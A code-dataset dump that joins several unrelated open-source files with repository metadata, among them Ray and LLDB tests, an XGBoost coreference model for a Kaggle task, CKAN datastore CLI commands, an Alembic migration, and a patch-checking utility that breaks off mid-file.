["ray start --head --ray-client-server-port 25552 --port 0"],
indirect=True)
def test_wrapped_actor_creation(call_ray_start):
"""
When the client schedules an actor, the server will load a separate
copy of the actor class if it's defined in a separate file. This
means that modifications to the client's copy of the actor class
aren't propagated to the server. Currently, tracing logic modifies
the signatures of actor methods to pass around metadata when ray.remote
is applied to an actor class. However, if a user does something like:
class SomeActor:
def __init__(self):
pass
def decorate_actor():
RemoteActor = ray.remote(SomeActor)
...
Then the SomeActor class will have its signatures modified on the client
side, but not on the server side, since ray.remote was applied inside of
the function instead of directly on the actor. Note if it were directly
applied to the actor then the signature would be modified when the server
imports the class.
"""
import ray
ray.init("ray://localhost:25552")
run_wrapped_actor_creation()
@pytest.mark.parametrize(
"call_ray_start",
["ray start --head --ray-client-server-port 25553 --num-cpus 0"],
indirect=True)
@pytest.mark.parametrize("use_client", [True, False])
def test_init_requires_no_resources(call_ray_start, use_client):
import ray
if use_client:
address = call_ray_start
ray.init(address)
else:
ray.init("ray://localhost:25553")
@ray.remote(num_cpus=0)
def f():
pass
ray.get(f.remote())
if __name__ == "__main__":
sys.exit(pytest.main(["-v", __file__]))
| 31.286452
| 80
| 0.615829
|
4a04dc1e0162362683e5c9012f085d2067199f21
| 10,309
|
py
|
Python
|
models/true_or_false_model.py
|
katsugeneration/gap-conf-kaggle
|
6c91b40a0f7dd30b24cbc3cbab664d187540e159
|
[
"MIT"
] | null | null | null |
models/true_or_false_model.py
|
katsugeneration/gap-conf-kaggle
|
6c91b40a0f7dd30b24cbc3cbab664d187540e159
|
[
"MIT"
] | null | null | null |
models/true_or_false_model.py
|
katsugeneration/gap-conf-kaggle
|
6c91b40a0f7dd30b24cbc3cbab664d187540e159
|
[
"MIT"
] | null | null | null |
import pandas
import utils
import pickle
import numpy as np
from sklearn.metrics import accuracy_score, log_loss
import optuna
import xgboost as xgb
from models import stanfordnlp_model
dtype = np.int32
DEFAULT_NGRAM_WINDOW = 2
DEFAULT_WINDOW_SIZE = 10
NONE_DEPENDENCY = 'NONE'
def _load_data(df, use_preprocessdata=False, save_path=None):
"""Load preprocess task speccific data.
Args:
df (DataFrame): target pandas DataFrame object.
use_preprocessdata (bool): Wheter or not to use local preprocess file loading
save_path (str): local preprocess file path
Return:
data (List[tuple]): words and indexes tuple list. Tulpe foramt is (sentence_words, [Pronnoun, A, B])
"""
if use_preprocessdata:
try:
with open(save_path, 'rb') as f:
data = pickle.load(f)
except: # noqa
use_preprocessdata = False
if not use_preprocessdata:
data = []
for i in range(len(df)):
words, pronnoun_index = utils.charpos_to_word_index(df['Text'][i], df['Pronoun-offset'][i], df['Pronoun'][i].split()[0])
_, A_index = utils.charpos_to_word_index(df['Text'][i], df['A-offset'][i], df['A'][i].split()[0], words=words)
_, B_index = utils.charpos_to_word_index(df['Text'][i], df['B-offset'][i], df['B'][i].split()[0], words=words)
data.append((words, [pronnoun_index, A_index, B_index]))
with open(save_path, 'wb') as f:
pickle.dump(data, f, protocol=pickle.HIGHEST_PROTOCOL)
print("Data Loaded")
return data
def _get_classify_labels(df):
"""Return task classify label
format is following.
data1 A is True or not
...
data1 B is True or not
...
Args:
df (DataFram): pandas DataFrame object
Return:
labels (array): label values. type of numpy int32 array. shaep is (2*N, 1)
"""
labels_A = np.zeros((len(df), 1), dtype=dtype)
labels_A[df['A-coref']] = 1
labels_B = np.zeros((len(df), 1), dtype=dtype)
labels_B[df['B-coref']] = 1
labels = np.concatenate([labels_A, labels_B])
return labels
def _preprocess_data(df, use_preprocessdata=False, save_path=None):
"""Preprocess task speccific pipeline.
Args:
df (DataFrame): target pandas DataFrame object.
use_preprocessdata (bool): Wheter or not to use local preprocess file loading
save_path (str): local preprocess file path
Return:
X (array): explanatory variables in task. shape is (n_sumples, n_features)
Y (array): objective variables in task. shape is (n_sumples, 1)
"""
data = _load_data(df, use_preprocessdata, save_path)
X = []
X2 = []
for i, (words, indexes) in enumerate(data):
X.append(
stanfordnlp_model._vectorise_bag_of_pos_with_position(words, indexes, DEFAULT_WINDOW_SIZE,
targets=[df['Pronoun'][i], df['A'][i], df['B'][i]]))
X2.append(stanfordnlp_model._vectorise_bag_of_pos_with_dependency(words, indexes))
X = np.array(X)
X2 = np.array(X2)
featur_len = int(X.shape[1] / 3)
featur_len2 = int(X2.shape[1] / 3)
X_pr = X[:, 0:featur_len]
X_a = X[:, featur_len:featur_len*2]
X_b = X[:, featur_len*2:featur_len*3]
X2_pr = X2[:, 0:featur_len2]
X2_a = X2[:, featur_len2:featur_len2*2]
X2_b = X2[:, featur_len2*2:featur_len2*3]
X_A = np.concatenate((
X_pr,
X_a,
X2_pr,
X2_a,
X_pr - X_a,
X_pr * X_a,
X2_pr - X2_a,
X2_pr * X2_a,
stanfordnlp_model._get_sexial_labels(df),
(df['Pronoun-offset'] - df['A-offset']).values.reshape(len(X), 1)), axis=1)
X_B = np.concatenate((
X_pr,
X_b,
X2_pr,
X2_b,
X_pr - X_b,
X_pr * X_b,
X2_pr - X2_b,
X2_pr * X2_b,
stanfordnlp_model._get_sexial_labels(df),
(df['Pronoun-offset'] - df['B-offset']).values.reshape(len(X), 1)), axis=1)
X = np.concatenate((X_A, X_B))
Y = _get_classify_labels(df)
return X, Y
def calculate_rate(y_pred):
"""Return categorical probability rate
dimesnsion 0 is A likelihood
dimesnsion 1 is B likelihood
dimesnsion 2 is not A or B likelihood
Args:
y_pred (array): prediction probability array folloeing format.
data1 A probability.
...
data2 B probability.
...
Return:
labels (array): label values. type of numpy int32 array. shaep is (N, 1)
"""
if len(y_pred.shape) == 2:
y_pred = y_pred[:, 1]
length = int(len(y_pred) / 2)
y_pred_A = y_pred[:length]
y_pred_B = y_pred[length:]
result = np.concatenate([
(y_pred_A).reshape(length, 1),
(y_pred_B).reshape(length, 1),
((1 - y_pred_A) * (1 - y_pred_B)).reshape(length, 1),
], axis=1)
result /= np.sum(result, axis=1, keepdims=1)
return result
def train(use_preprocessdata=True):
df = pandas.read_csv('dataset/gap-test.tsv', sep='\t')
X, Y = _preprocess_data(df, use_preprocessdata=use_preprocessdata, save_path='preprocess_traindata.pkl')
Y_labels = stanfordnlp_model._get_classify_labels(df)
validation_df = pandas.read_csv('dataset/gap-validation.tsv', sep='\t')
validation_X, validation_Y = _preprocess_data(validation_df, use_preprocessdata=use_preprocessdata, save_path='preprocess_valdata.pkl')
validation_Y_labels = stanfordnlp_model._get_classify_labels(validation_df)
def objective(trial):
eta = trial.suggest_loguniform('eta', 0.001, 0.1)
max_depth = trial.suggest_int('max_depth', 3, 25)
gamma = trial.suggest_loguniform('gamma', 0.05, 1.0)
min_child_weight = trial.suggest_int('min_child_weight', 1, 7)
subsample = trial.suggest_discrete_uniform('subsample', 0.6, 1.0, 0.1)
colsample_bytree = trial.suggest_discrete_uniform('colsample_bytree', 0.6, 1.0, 0.1)
model = xgb.XGBClassifier(
max_depth=max_depth,
eta=eta,
gamma=gamma,
min_child_weight=min_child_weight,
subsample=subsample,
colsample_bytree=colsample_bytree,
n_jobs=1,
random_state=0)
def _log_loss(y_pred, y):
"""For XGBoost logloss calculator."""
y_pred = calculate_rate(y_pred)
return 'logloss', log_loss(validation_Y_labels, y_pred)
pruning_callback = optuna.integration.XGBoostPruningCallback(trial, 'validation_0-logloss')
model.fit(
X,
Y.flatten(),
eval_set=[(validation_X, validation_Y.flatten())],
eval_metric=_log_loss,
callbacks=[pruning_callback],
verbose=False)
return log_loss(validation_Y_labels, calculate_rate(model.predict_proba(validation_X)))
study = optuna.create_study(
study_name='gap-conf-kaggle',
pruner=optuna.pruners.MedianPruner(),
sampler=optuna.samplers.TPESampler(seed=0))
study.optimize(objective, n_trials=100, n_jobs=-1)
print("Best Params", study.best_params)
print("Best Validation Value", study.best_value)
model = xgb.XGBClassifier(n_jobs=-1, random_state=0, **study.best_params)
model.fit(
np.concatenate([X, validation_X]),
np.concatenate([Y, validation_Y]).flatten())
with open('model.pkl', 'wb') as f:
pickle.dump(model, f, protocol=pickle.HIGHEST_PROTOCOL)
y_pred = calculate_rate(model.predict_proba(X))
print("Train Accuracy:", accuracy_score(Y_labels, np.argmax(y_pred, axis=1)))
def evaluate(test_data, use_preprocessdata=True):
train()
X, Y = _preprocess_data(test_data, use_preprocessdata=use_preprocessdata, save_path='preprocess_testdata.pkl')
Y_labels = stanfordnlp_model._get_classify_labels(test_data)
with open('model.pkl', 'rb') as f:
model = pickle.load(f)
pred = model.predict_proba(X)
y_pred = calculate_rate(pred)
print("Test Accuracy:", accuracy_score(Y_labels, np.argmax(y_pred, axis=1)))
a = (Y_labels.flatten()[:20] != np.argmax(y_pred[:20], axis=1))
print("Error A count", len(Y_labels[Y_labels.flatten() == 0]), len(Y_labels[Y_labels.flatten() == 0][(Y_labels[Y_labels.flatten() == 0].flatten() != np.argmax(y_pred[Y_labels.flatten() == 0], axis=1))]))
print("Error B count", len(Y_labels[Y_labels.flatten() == 1]), len(Y_labels[Y_labels.flatten() == 1][Y_labels[Y_labels.flatten() == 1].flatten() != np.argmax(y_pred[Y_labels.flatten() == 1], axis=1)]))
print("Error Pronnoun count", len(Y_labels[Y_labels.flatten() == 2]), len(Y_labels[Y_labels.flatten() == 2][Y_labels[Y_labels.flatten() == 2].flatten() != np.argmax(y_pred[Y_labels.flatten() == 2], axis=1)]))
print("Error Case", Y_labels[:20][a])
print("Error Case Label", np.argmax(y_pred[:20][a], axis=1))
print("Error Case Rate", y_pred[:20][a])
print("A predictions", pred[:20][a])
print("B predictions", pred[int(len(pred)/2):int(len(pred)/2)+20][a])
data = _load_data(test_data, True, 'preprocess_testdata.pkl')
for i, (words, indexes) in enumerate(data):
if i in np.where(a == True)[0]:
print("Index", i)
print("Pronounce position", stanfordnlp_model._get_bag_of_pos_with_position(words, indexes[0], DEFAULT_WINDOW_SIZE, target_len=len(test_data['Pronoun'][i].split())))
print("A position", stanfordnlp_model._get_bag_of_pos_with_position(words, indexes[1], DEFAULT_WINDOW_SIZE, target_len=len(test_data['A'][i].split())))
print("B position", stanfordnlp_model._get_bag_of_pos_with_position(words, indexes[2], DEFAULT_WINDOW_SIZE, target_len=len(test_data['B'][i].split())))
print("Pronounce dependency", stanfordnlp_model._get_bag_of_pos_with_dependency(words, indexes[0]))
print("A dependency", stanfordnlp_model._get_bag_of_pos_with_dependency(words, indexes[1]))
print("B dependency", stanfordnlp_model._get_bag_of_pos_with_dependency(words, indexes[2]))
predicts = calculate_rate(model.predict_proba(X))
out_df = pandas.DataFrame(data=predicts, columns=['A', 'B', 'NEITHER'])
out_df['ID'] = test_data['ID']
return out_df
| 42.077551
| 212
| 0.644097
|
4a04de3340f24a7c515854fa5b96aeedb23f74c8
| 1,871
|
py
|
Python
|
lldb/test/API/lang/objc/foundation/TestObjCMethodsNSError.py
|
mkinsner/llvm
|
589d48844edb12cd357b3024248b93d64b6760bf
|
[
"Apache-2.0"
] | 2,338
|
2018-06-19T17:34:51.000Z
|
2022-03-31T11:00:37.000Z
|
lldb/test/API/lang/objc/foundation/TestObjCMethodsNSError.py
|
mkinsner/llvm
|
589d48844edb12cd357b3024248b93d64b6760bf
|
[
"Apache-2.0"
] | 3,740
|
2019-01-23T15:36:48.000Z
|
2022-03-31T22:01:13.000Z
|
lldb/test/API/lang/objc/foundation/TestObjCMethodsNSError.py
|
mkinsner/llvm
|
589d48844edb12cd357b3024248b93d64b6760bf
|
[
"Apache-2.0"
] | 500
|
2019-01-23T07:49:22.000Z
|
2022-03-30T02:59:37.000Z
|
"""
Test more expression command sequences with objective-c.
"""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class FoundationTestCaseNSError(TestBase):
mydir = TestBase.compute_mydir(__file__)
@expectedFailureAll(archs=["i[3-6]86"], bugnumber="<rdar://problem/28814052>")
def test_runtime_types(self):
"""Test commands that require runtime types"""
self.build()
self.target, process, thread, bkpt = lldbutil.run_to_source_breakpoint(
self, '// Break here for NSString tests',
lldb.SBFileSpec('main.m', False))
# Test_NSString:
self.runCmd("thread backtrace")
self.expect("expression [str length]",
patterns=["\(NSUInteger\) \$.* ="])
self.expect("expression str.length")
self.expect('expression str = [NSString stringWithCString: "new"]')
self.expect(
'po [NSError errorWithDomain:@"Hello" code:35 userInfo:@{@"NSDescription" : @"be completed."}]',
substrs=[
"Error Domain=Hello",
"Code=35",
"be completed."])
self.runCmd("process continue")
@expectedFailureAll(archs=["i[3-6]86"], bugnumber="<rdar://problem/28814052>")
def test_NSError_p(self):
"""Test that p of the result of an unknown method does require a cast."""
self.build()
self.target, process, thread, bkpt = lldbutil.run_to_source_breakpoint(
self, '// Set break point at this line',
lldb.SBFileSpec('main.m', False))
self.expect("p [NSError thisMethodIsntImplemented:0]", error=True, patterns=[
"no known method", "cast the message send to the method's return type"])
self.runCmd("process continue")
| 38.183673
| 108
| 0.618386
|
4a04de881bbf71126f3dfd62a2c7df73418d8a33
| 5,446
|
py
|
Python
|
ckanext/datastore/cli.py
|
mabah-mst/ckan
|
105f613272c2e31daa0081ead24c678bf1b55c22
|
[
"Apache-2.0"
] | 2
|
2017-05-15T08:16:49.000Z
|
2019-05-30T23:53:39.000Z
|
ckanext/datastore/cli.py
|
mabah-mst/ckan
|
105f613272c2e31daa0081ead24c678bf1b55c22
|
[
"Apache-2.0"
] | 1
|
2021-05-13T11:24:02.000Z
|
2021-05-13T11:24:02.000Z
|
ckanext/datastore/cli.py
|
cascaoSDC/ckan
|
75a08caa7c688ce70229dfea7070cc667a15c5e8
|
[
"BSD-3-Clause"
] | 4
|
2018-10-08T12:05:16.000Z
|
2021-11-24T16:18:52.000Z
|
# encoding: utf-8
import logging
import os
import click
from ckan.model import parse_db_config
from ckan.common import config
import ckan.logic as logic
import ckanext.datastore as datastore_module
from ckanext.datastore.backend.postgres import identifier
from ckanext.datastore.blueprint import DUMP_FORMATS, dump_to
log = logging.getLogger(__name__)
@click.group()
def datastore():
u'''Perform commands to set up the datastore.
'''
@datastore.command(
u'set-permissions',
short_help=u'Generate SQL for permission configuration.'
)
def set_permissions():
u'''Emit an SQL script that will set the permissions for the datastore
users as configured in your configuration file.'''
write_url = _parse_db_config(u'ckan.datastore.write_url')
read_url = _parse_db_config(u'ckan.datastore.read_url')
db_url = _parse_db_config(u'sqlalchemy.url')
# Basic validation that read and write URLs reference the same database.
# This obviously doesn't check they're the same database (the hosts/ports
# could be different), but it's better than nothing, I guess.
if write_url[u'db_name'] != read_url[u'db_name']:
click.secho(
u'The datastore write_url and read_url must refer to the same '
u'database!',
fg=u'red',
bold=True
)
raise click.Abort()
sql = permissions_sql(
maindb=db_url[u'db_name'],
datastoredb=write_url[u'db_name'],
mainuser=db_url[u'db_user'],
writeuser=write_url[u'db_user'],
readuser=read_url[u'db_user']
)
click.echo(sql)
def permissions_sql(maindb, datastoredb, mainuser, writeuser, readuser):
template_filename = os.path.join(
os.path.dirname(datastore_module.__file__), u'set_permissions.sql'
)
with open(template_filename) as fp:
template = fp.read()
return template.format(
maindb=identifier(maindb),
datastoredb=identifier(datastoredb),
mainuser=identifier(mainuser),
writeuser=identifier(writeuser),
readuser=identifier(readuser)
)
@datastore.command()
@click.argument(u'resource-id', nargs=1)
@click.argument(
u'output-file',
type=click.File(u'wb'),
default=click.get_binary_stream(u'stdout')
)
@click.option(u'--format', default=u'csv', type=click.Choice(DUMP_FORMATS))
@click.option(u'--offset', type=click.IntRange(0, None), default=0)
@click.option(u'--limit', type=click.IntRange(0))
@click.option(u'--bom', is_flag=True) # FIXME: options based on format
@click.pass_context
def dump(ctx, resource_id, output_file, format, offset, limit, bom):
u'''Dump a datastore resource.
'''
flask_app = ctx.meta['flask_app']
with flask_app.test_request_context():
dump_to(
resource_id,
output_file,
fmt=format,
offset=offset,
limit=limit,
options={u'bom': bom},
sort=u'_id',
search_params={}
)
def _parse_db_config(config_key=u'sqlalchemy.url'):
db_config = parse_db_config(config_key)
if not db_config:
click.secho(
u'Could not extract db details from url: %r' % config[config_key],
fg=u'red',
bold=True
)
raise click.Abort()
return db_config
@datastore.command(
u'purge',
short_help=u'purge orphaned resources from the datastore.'
)
def purge():
u'''Purge orphaned resources from the datastore using the datastore_delete
action, which drops tables when called without filters.'''
site_user = logic.get_action(u'get_site_user')({u'ignore_auth': True}, {})
context = {u'user': site_user[u'name']}
result = logic.get_action(u'datastore_search')(
context,
{u'resource_id': u'_table_metadata'}
)
resource_id_list = []
for record in result[u'records']:
try:
# ignore 'alias' records (views) as they are automatically
# deleted when the parent resource table is dropped
if record[u'alias_of']:
continue
# we need to do this to trigger resource_show auth function
site_user = logic.get_action(u'get_site_user')(
{u'ignore_auth': True}, {})
context = {u'user': site_user[u'name']}
logic.get_action(u'resource_show')(
context,
{u'id': record[u'name']}
)
except logic.NotFound:
resource_id_list.append(record[u'name'])
click.echo(u"Resource '%s' orphaned - queued for drop" %
record[u'name'])
except KeyError:
continue
orphaned_table_count = len(resource_id_list)
click.echo(u'%d orphaned tables found.' % orphaned_table_count)
if not orphaned_table_count:
return
click.confirm(u'Proceed with purge?', abort=True)
# Drop the orphaned datastore tables. When datastore_delete is called
# without filters, it does a drop table cascade
drop_count = 0
for resource_id in resource_id_list:
logic.get_action(u'datastore_delete')(
context,
{u'resource_id': resource_id, u'force': True}
)
click.echo(u"Table '%s' dropped)" % resource_id)
drop_count += 1
click.echo(u'Dropped %s tables' % drop_count)
def get_commands():
return (set_permissions, dump, purge)
| 30.088398
| 78
| 0.643959
|
4a04e22adafbd1373a9d9fc82325fd3d15005b8b
| 647
|
py
|
Python
|
Lesson 13.gf/xml_Leader2.py
|
gfoo003/programming-together
|
225e0a2255dd8da1f1ef32d2a88deea27c050f10
|
[
"MIT"
] | null | null | null |
Lesson 13.gf/xml_Leader2.py
|
gfoo003/programming-together
|
225e0a2255dd8da1f1ef32d2a88deea27c050f10
|
[
"MIT"
] | null | null | null |
Lesson 13.gf/xml_Leader2.py
|
gfoo003/programming-together
|
225e0a2255dd8da1f1ef32d2a88deea27c050f10
|
[
"MIT"
] | null | null | null |
import xml.etree.ElementTree as ET
xml_string = '''
<stuff>
<users>
<user x = "2">
<id>001</id>
<name>Chuck</name>
</user>
<user x = "7">
<id>007</id>
<name>Brent</name>
</user>
</users>
</stuff>
'''
root_stuff = ET.fromstring(xml_string)
#don't usually refer to root element
user_elements = root_stuff.findall('users/user')
print ('user count:', len(user_elements))
for user in user_elements:
print('name:', user.find('name').text)
print('id:', user.find('id').text)
print('attribute(x):', user.get('x'))
#to identify attribute use 'get's
| 23.107143
| 48
| 0.565688
|
4a04e26d0887bc85a21fc7afaeec298a95c56f0b
| 415
|
py
|
Python
|
basic/publishers/models.py
|
rmolinamir/Django-App
|
b1e7eac22caa0010ac2a592ee7edb829f6eeb95a
|
[
"MIT"
] | null | null | null |
basic/publishers/models.py
|
rmolinamir/Django-App
|
b1e7eac22caa0010ac2a592ee7edb829f6eeb95a
|
[
"MIT"
] | 7
|
2020-02-12T03:21:09.000Z
|
2022-02-10T09:04:52.000Z
|
basic/publishers/models.py
|
rmolinamir/Django-App
|
b1e7eac22caa0010ac2a592ee7edb829f6eeb95a
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.contrib.auth.models import BaseUserManager
class Publisher(models.Model):
"""
Schema for publisher instances.
"""
name = models.TextField(null=False)
created_at = models.DateField(editable=False, auto_now=True)
objects = BaseUserManager()
def __str__(self):
"""Return string representation of our publisher"""
return self.name
| 25.9375
| 64
| 0.703614
|
4a04e350f4222ba29bc0dff4fb87e51d56ba0603
| 6,816
|
py
|
Python
|
migrations/versions/d6c0f2c3dfbe_.py
|
EandrewJones/srdp-database
|
22b9f5bcbffcd14b17cd62c6b268e5be079bf4fe
|
[
"MIT"
] | null | null | null |
migrations/versions/d6c0f2c3dfbe_.py
|
EandrewJones/srdp-database
|
22b9f5bcbffcd14b17cd62c6b268e5be079bf4fe
|
[
"MIT"
] | null | null | null |
migrations/versions/d6c0f2c3dfbe_.py
|
EandrewJones/srdp-database
|
22b9f5bcbffcd14b17cd62c6b268e5be079bf4fe
|
[
"MIT"
] | null | null | null |
"""empty message
Revision ID: d6c0f2c3dfbe
Revises:
Create Date: 2022-04-11 21:19:57.276686
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'd6c0f2c3dfbe'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('groups',
sa.Column('created_at', sa.DateTime(timezone=True), nullable=True),
sa.Column('modified_at', sa.DateTime(timezone=True), nullable=True),
sa.Column('kgcId', sa.Integer(), nullable=False),
sa.Column('groupName', sa.String(length=255), nullable=False),
sa.Column('country', sa.String(length=255), nullable=False),
sa.Column('startYear', sa.Integer(), nullable=True),
sa.Column('endYear', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('kgcId')
)
op.create_index(op.f('ix_groups_groupName'), 'groups', ['groupName'], unique=False)
op.create_index(op.f('ix_groups_created_at'), 'groups', ['created_at'], unique=False)
op.create_index(op.f('ix_groups_modified_at'), 'groups', ['modified_at'], unique=False)
op.create_table('user',
sa.Column('created_at', sa.DateTime(timezone=True), nullable=True),
sa.Column('modified_at', sa.DateTime(timezone=True), nullable=True),
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('username', sa.String(length=64), nullable=True),
sa.Column('email', sa.String(length=120), nullable=True),
sa.Column('name', sa.String(length=120), nullable=True),
sa.Column('password_hash', sa.String(length=128), nullable=True),
sa.Column('token', sa.String(length=32), nullable=True),
sa.Column('token_expiration', sa.DateTime(), nullable=True),
sa.Column('is_admin', sa.Boolean(), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('email'),
sa.UniqueConstraint('username')
)
op.create_index(op.f('ix_user_created_at'), 'user', ['created_at'], unique=False)
op.create_index(op.f('ix_user_modified_at'), 'user', ['modified_at'], unique=False)
op.create_index(op.f('ix_user_name'), 'user', ['name'], unique=False)
op.create_index(op.f('ix_user_token'), 'user', ['token'], unique=True)
op.create_table('organizations',
sa.Column('created_at', sa.DateTime(timezone=True), nullable=True),
sa.Column('modified_at', sa.DateTime(timezone=True), nullable=True),
sa.Column('facId', sa.Integer(), nullable=False),
sa.Column('kgcId', sa.Integer(), nullable=True),
sa.Column('facName', sa.String(length=767), nullable=False),
sa.Column('startYear', sa.Integer(), nullable=True),
sa.Column('endYear', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['kgcId'], ['groups.kgcId'], ),
sa.PrimaryKeyConstraint('facId'),
sa.UniqueConstraint('facId')
)
op.create_index(op.f('ix_organizations_created_at'), 'organizations', ['created_at'], unique=False)
op.create_index(op.f('ix_organizations_modified_at'), 'organizations', ['modified_at'], unique=False)
op.create_table('nonviolence',
sa.Column('created_at', sa.DateTime(timezone=True), nullable=True),
sa.Column('modified_at', sa.DateTime(timezone=True), nullable=True),
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('facId', sa.Integer(), nullable=True),
sa.Column('year', sa.Integer(), nullable=True),
sa.Column('economicNoncooperation', sa.Integer(), nullable=False),
sa.Column('protestDemonstration', sa.Integer(), nullable=False),
sa.Column('nonviolentIntervention', sa.Integer(), nullable=False),
sa.Column('socialNoncooperation', sa.Integer(), nullable=False),
sa.Column('institutionalAction', sa.Integer(), nullable=False),
sa.Column('politicalNoncooperation', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['facId'], ['organizations.facId'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_nonviolence_facId'), 'nonviolence', ['facId'], unique=False)
op.create_index(op.f('ix_nonviolence_created_at'), 'nonviolence', ['created_at'], unique=False)
op.create_index(op.f('ix_nonviolence_modified_at'), 'nonviolence', ['modified_at'], unique=False)
op.create_table('violence',
sa.Column('created_at', sa.DateTime(timezone=True), nullable=True),
sa.Column('modified_at', sa.DateTime(timezone=True), nullable=True),
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('facId', sa.Integer(), nullable=True),
sa.Column('year', sa.Integer(), nullable=True),
sa.Column('againstState', sa.Integer(), nullable=False),
sa.Column('againstStateFatal', sa.Integer(), nullable=False),
sa.Column('againstOrg', sa.Integer(), nullable=False),
sa.Column('againstOrgFatal', sa.Integer(), nullable=False),
sa.Column('againstIngroup', sa.Integer(), nullable=False),
sa.Column('againstIngroupFatal', sa.Integer(), nullable=False),
sa.Column('againstOutgroup', sa.Integer(), nullable=False),
sa.Column('againstOutgroupFatal', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['facId'], ['organizations.facId'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_violence_facId'), 'violence', ['facId'], unique=False)
op.create_index(op.f('ix_violence_created_at'), 'violence', ['created_at'], unique=False)
op.create_index(op.f('ix_violence_modified_at'), 'violence', ['modified_at'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_violence_modified_at'), table_name='violence')
op.drop_index(op.f('ix_violence_created_at'), table_name='violence')
op.drop_index(op.f('ix_violence_facId'), table_name='violence')
op.drop_table('violence')
op.drop_index(op.f('ix_nonviolence_modified_at'), table_name='nonviolence')
op.drop_index(op.f('ix_nonviolence_created_at'), table_name='nonviolence')
op.drop_index(op.f('ix_nonviolence_facId'), table_name='nonviolence')
op.drop_table('nonviolence')
op.drop_index(op.f('ix_organizations_modified_at'), table_name='organizations')
op.drop_index(op.f('ix_organizations_created_at'), table_name='organizations')
op.drop_table('organizations')
op.drop_index(op.f('ix_user_token'), table_name='user')
op.drop_index(op.f('ix_user_name'), table_name='user')
op.drop_index(op.f('ix_user_modified_at'), table_name='user')
op.drop_index(op.f('ix_user_created_at'), table_name='user')
op.drop_table('user')
op.drop_index(op.f('ix_groups_modified_at'), table_name='groups')
op.drop_index(op.f('ix_groups_created_at'), table_name='groups')
op.drop_index(op.f('ix_groups_groupName'), table_name='groups')
op.drop_table('groups')
# ### end Alembic commands ###
| 52.030534
| 105
| 0.702171
|
4a04e38beb9bcefe3a2685a219769dc9a94c54da
| 1,017
|
py
|
Python
|
designate/scheduler/__init__.py
|
ISCAS-VDI/designate-base
|
bd945607e3345fbef8645c3441e96b032b70b098
|
[
"Apache-2.0"
] | null | null | null |
designate/scheduler/__init__.py
|
ISCAS-VDI/designate-base
|
bd945607e3345fbef8645c3441e96b032b70b098
|
[
"Apache-2.0"
] | null | null | null |
designate/scheduler/__init__.py
|
ISCAS-VDI/designate-base
|
bd945607e3345fbef8645c3441e96b032b70b098
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Hewlett Packard Enterprise Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
from designate.scheduler.base import Scheduler
LOG = logging.getLogger(__name__)
cfg.CONF.register_opts([
cfg.ListOpt(
'scheduler_filters',
default=['default_pool'],
help='Enabled Pool Scheduling filters'),
], group='service:central')
def get_scheduler(storage):
return Scheduler(storage=storage)
| 30.818182
| 75
| 0.751229
|
4a04e3a33b3983b23a06a7127a91a499cf37f0bf
| 4,355
|
py
|
Python
|
devutils/check_patch_files.py
|
InternetGoddessShinatama/Manamoon
|
abfdd8f247497cda2a57a8dbc93f6193c4b8345b
|
[
"BSD-3-Clause"
] | null | null | null |
devutils/check_patch_files.py
|
InternetGoddessShinatama/Manamoon
|
abfdd8f247497cda2a57a8dbc93f6193c4b8345b
|
[
"BSD-3-Clause"
] | null | null | null |
devutils/check_patch_files.py
|
InternetGoddessShinatama/Manamoon
|
abfdd8f247497cda2a57a8dbc93f6193c4b8345b
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# Copyright (c) 2020 Saint Corp. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Run sanity checking algorithms over Manamoon's patch files
It checks the following:
* All patches exist
* All patches are referenced by the patch order
Exit codes:
* 0 if no problems detected
* 1 if warnings or errors occur
"""
import argparse
import sys
from pathlib import Path
from third_party import unidiff
sys.path.insert(0, str(Path(__file__).resolve().parent.parent / 'utils'))
from _common import ENCODING, get_logger, parse_series
sys.path.pop(0)
# File suffixes to ignore for checking unused patches
_PATCHES_IGNORE_SUFFIXES = {'.md'}
def _read_series_file(patches_dir, series_file, join_dir=False):
"""
Returns a generator over the entries in the series file
patches_dir is a pathlib.Path to the directory of patches
series_file is a pathlib.Path relative to patches_dir
join_dir indicates if the patches_dir should be joined with the series entries
"""
for entry in parse_series(patches_dir / series_file):
if join_dir:
yield patches_dir / entry
else:
yield entry
def check_patch_readability(patches_dir, series_path=Path('series')):
"""
Check if the patches from iterable patch_path_iter are readable.
Patches that are not are logged to stdout.
Returns True if warnings occured, False otherwise.
"""
warnings = False
for patch_path in _read_series_file(patches_dir, series_path, join_dir=True):
if patch_path.exists():
with patch_path.open(encoding=ENCODING) as file_obj:
try:
unidiff.PatchSet(file_obj.read())
except unidiff.errors.UnidiffParseError:
get_logger().exception('Could not parse patch: %s', patch_path)
warnings = True
continue
else:
get_logger().warning('Patch not found: %s', patch_path)
warnings = True
return warnings
def check_unused_patches(patches_dir, series_path=Path('series')):
"""
Checks if there are unused patches in patch_dir from series file series_path.
Unused patches are logged to stdout.
patches_dir is a pathlib.Path to the directory of patches
series_path is a pathlib.Path to the series file relative to the patches_dir
Returns True if there are unused patches; False otherwise.
